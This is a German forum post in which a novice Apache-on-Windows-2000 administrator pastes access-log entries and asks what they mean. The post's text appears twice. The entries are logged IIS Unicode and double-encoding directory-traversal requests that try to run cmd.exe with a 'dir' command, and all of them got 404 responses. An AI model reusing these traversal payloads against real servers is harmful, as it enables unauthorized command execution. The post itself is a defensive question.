Hi Leute,
Ich hab seit ein paar Tagen bei mir einen Webserver (Apache) unter Win200 laufen, und hab mir mal die Logdatei angeschaut. Bis auf einige Ausnahmen stehen auch ganz normale Sachen drinnen, wie z.B.
192.168.0.2 - - [18/Dec/2001:00:56:44 +0100] "GET /BIO/Ernaehrung/spurel.html HTTP/1.1" 200 1476
Aber dazwischen findet sich immer wieder:
62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
Mich würde interressieren, was derjenige mit solchen Anfragen bezweckt? Gibt´s da irgendein Sicherheitsloch von dem ich wisen sollte?
thx im Vorraus
Noob
P.S.: Win2000 hat das neueste Service Pack, Apache Version ist 1.3.22
Ich hab seit ein paar Tagen bei mir einen Webserver (Apache) unter Win200 laufen, und hab mir mal die Logdatei angeschaut. Bis auf einige Ausnahmen stehen auch ganz normale Sachen drinnen, wie z.B.
192.168.0.2 - - [18/Dec/2001:00:56:44 +0100] "GET /BIO/Ernaehrung/spurel.html HTTP/1.1" 200 1476
Aber dazwischen findet sich immer wieder:
62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
Mich würde interressieren, was derjenige mit solchen Anfragen bezweckt? Gibt´s da irgendein Sicherheitsloch von dem ich wisen sollte?
thx im Vorraus
Noob
P.S.: Win2000 hat das neueste Service Pack, Apache Version ist 1.3.22